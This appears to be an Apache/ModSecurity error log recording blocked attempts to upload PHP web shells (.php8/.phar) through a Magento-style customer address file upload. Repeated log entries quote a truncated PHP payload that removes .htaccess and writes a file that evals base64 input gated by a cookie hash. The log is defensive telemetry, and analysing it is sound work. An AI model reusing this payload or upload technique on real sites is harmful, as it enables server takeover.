[Sun Jan 04 21:57:26.645441 2026] [:error] [pid 1196007] [client 46.149.66.101:47848] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/t/bt88364f428d25.php8"] [unique_id "aVrUNmAl4u4uHVCLj6p-WAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:15.193125 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Rule 7f0a0e916be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aVxH46quKB7It2jaKpZFjQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:15.193604 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aVxH46quKB7It2jaKpZFjQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:15.195864 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aVxH46quKB7It2jaKpZFjQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:15.196114 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.phar"] [unique_id "aVxH46quKB7It2jaKpZFjQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:15.911487 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: dp88364f428d25.php8 found within FILES:custom_attributes[country_id]: dp88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVxH46quKB7It2jaKpZFjgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/p/dp88364f428d25.phar
[Tue Jan 06 00:23:15.912105 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVxH46quKB7It2jaKpZFjgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/p/dp88364f428d25.phar
[Tue Jan 06 00:23:15.912267 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVxH46quKB7It2jaKpZFjgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/p/dp88364f428d25.phar
[Tue Jan 06 00:23:16.493768 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Rule 7f0a0e916be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aVxH5KquKB7It2jaKpZFjwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:16.494231 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aVxH5KquKB7It2jaKpZFjwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:16.496600 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aVxH5KquKB7It2jaKpZFjwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 00:23:16.496774 2026] [:error] [pid 1223534] [client 194.110.207.198:58022] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/p/dp88364f428d25.php8"] [unique_id "aVxH5KquKB7It2jaKpZFjwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 06 01:58:16.022935 2026] [authz_core:error] [pid 1223535] [client 4.196.91.34:60262] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config.php
[Wed Jan 07 02:33:22.624576 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Rule 7f55a0e7abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.phar"] [unique_id "aV234vSOJvjzblTZqxlV7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 07 02:33:22.625055 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.phar"] [unique_id "aV234vSOJvjzblTZqxlV7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 07 02:33:22.627369 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.phar"] [unique_id "aV234vSOJvjzblTZqxlV7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 07 02:33:22.627554 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.phar"] [unique_id "aV234vSOJvjzblTZqxlV7gAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 07 02:33:22.856246 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: t688364f428d25.php8 found within FILES:custom_attributes[country_id]: t688364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aV234vSOJvjzblTZqxlV7wAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/6/t688364f428d25.phar
[Wed Jan 07 02:33:22.856873 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aV234vSOJvjzblTZqxlV7wAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/6/t688364f428d25.phar
[Wed Jan 07 02:33:22.857045 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aV234vSOJvjzblTZqxlV7wAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/6/t688364f428d25.phar
[Wed Jan 07 02:33:23.106070 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Rule 7f55a0e7abe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.php8"] [unique_id "aV234_SOJvjzblTZqxlV8AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 07 02:33:23.106551 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.php8"] [unique_id "aV234_SOJvjzblTZqxlV8AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 07 02:33:23.109031 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.php8"] [unique_id "aV234_SOJvjzblTZqxlV8AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 07 02:33:23.109225 2026] [:error] [pid 1247900] [client 194.110.207.198:55886] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/6/t688364f428d25.php8"] [unique_id "aV234_SOJvjzblTZqxlV8AAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:18.015297 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Rule 7fc96848bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.phar"] [unique_id "aV8sShmwMJtANIcuNUXoRgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:18.016938 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.phar"] [unique_id "aV8sShmwMJtANIcuNUXoRgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:18.019463 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.phar"] [unique_id "aV8sShmwMJtANIcuNUXoRgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:18.019650 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.phar"] [unique_id "aV8sShmwMJtANIcuNUXoRgAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:18.480390 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: dz88364f428d25.php8 found within FILES:custom_attributes[country_id]: dz88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aV8sShmwMJtANIcuNUXoRwAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/z/dz88364f428d25.phar
[Thu Jan 08 05:02:18.481049 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aV8sShmwMJtANIcuNUXoRwAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/z/dz88364f428d25.phar
[Thu Jan 08 05:02:18.481214 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aV8sShmwMJtANIcuNUXoRwAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/z/dz88364f428d25.phar
[Thu Jan 08 05:02:21.223815 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Rule 7fc96848bbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/z/dz88364f428d25.php8"] [unique_id "aV8sTRmwMJtANIcuNUXoSAAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 08 05:02:21.224297 2026] [:error] [pid 1270038] [client 93.175.201.111:35816] [client 93.175.201.111] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag 